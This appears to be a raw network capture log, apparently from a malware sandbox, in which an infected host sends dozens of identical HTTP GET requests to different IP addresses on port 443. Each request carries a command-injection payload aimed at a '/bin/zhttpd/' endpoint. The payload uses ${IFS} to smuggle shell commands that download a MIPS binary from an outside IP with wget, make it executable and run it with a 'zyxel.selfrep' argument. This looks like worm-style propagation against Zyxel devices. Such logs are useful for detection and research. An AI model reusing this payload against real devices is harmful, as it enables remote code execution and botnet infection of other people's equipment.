                                              Jan 29, 2024 07:03:59.191689014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6663192.168.2.143488671.63.202.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191730022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6664192.168.2.1435588204.130.152.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191761017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6665192.168.2.143367019.77.183.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191796064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6666192.168.2.1443934144.174.186.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191837072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6667192.168.2.14508041.17.200.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191869020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6668192.168.2.143770244.219.233.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191899061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6669192.168.2.1450080104.244.161.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191946983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6670192.168.2.14588462.159.158.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.191984892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6671192.168.2.143979224.236.8.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192028999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6672192.168.2.1455242198.178.193.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192063093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6673192.168.2.1450636135.91.125.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192117929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6674192.168.2.143559088.89.150.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192152977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6675192.168.2.144964039.210.172.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192192078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6676192.168.2.143705473.95.16.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192192078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6677192.168.2.1437882183.71.193.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192270994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6678192.168.2.144059039.162.131.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192303896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6679192.168.2.1457378223.221.220.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192346096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6680192.168.2.1447122216.116.29.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192388058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6681192.168.2.1450498184.58.132.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192398071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6682192.168.2.1446326160.247.90.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192450047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6683192.168.2.1447878203.235.144.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192508936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6684192.168.2.143933261.60.16.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192516088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6685192.168.2.14594844.0.20.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192574024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6686192.168.2.143566047.220.15.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192581892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6687192.168.2.144739246.156.124.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192634106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6688192.168.2.1455570164.190.104.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192665100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6689192.168.2.1442336132.66.28.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192718983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6690192.168.2.1455790221.69.196.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192733049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6691192.168.2.1458942125.110.108.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192786932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6692192.168.2.1454350155.25.190.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192822933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6693192.168.2.1439114123.181.230.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192873955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6694192.168.2.145907692.93.4.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192919016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6695192.168.2.1451584193.196.169.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192941904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6696192.168.2.1455464136.140.205.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.192996979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6697192.168.2.1442264210.87.3.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193044901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6698192.168.2.1449684101.195.146.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193073988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6699192.168.2.1450700210.163.228.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193100929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6700192.168.2.1452618178.222.47.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193161964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6701192.168.2.1435206221.126.101.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193178892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6702192.168.2.1450718100.8.212.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193212986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6703192.168.2.1446448197.118.181.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193233967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6704192.168.2.1442820221.116.12.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193267107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6705192.168.2.1436108177.140.213.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193311930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6706192.168.2.1435994223.214.63.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193341970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6707192.168.2.1436976107.155.107.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193368912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6708192.168.2.1454630194.168.174.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193404913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6709192.168.2.144750864.238.243.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193449974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6710192.168.2.1456598184.47.61.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193478107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6711192.168.2.1453620109.191.143.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193514109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6712192.168.2.144519014.124.55.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193563938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6713192.168.2.1441628207.235.54.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193600893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6714192.168.2.1453282154.172.217.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193624020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6715192.168.2.1436936146.164.101.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193666935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6716192.168.2.1434406129.88.1.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193707943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6717192.168.2.1455514121.230.87.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193743944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6718192.168.2.1458104101.200.199.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193763971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6719192.168.2.1443846128.182.242.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193799973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6720192.168.2.1459526141.128.207.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193846941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6721192.168.2.1452090125.221.200.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193880081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6722192.168.2.145482639.14.149.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193941116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6723192.168.2.143921219.219.188.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193954945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6724192.168.2.1459446109.172.175.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.193977118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6725192.168.2.1451600106.101.191.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.194046021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6726192.168.2.145000445.168.101.228443
                                              TimestampBytes transferredDirectionData
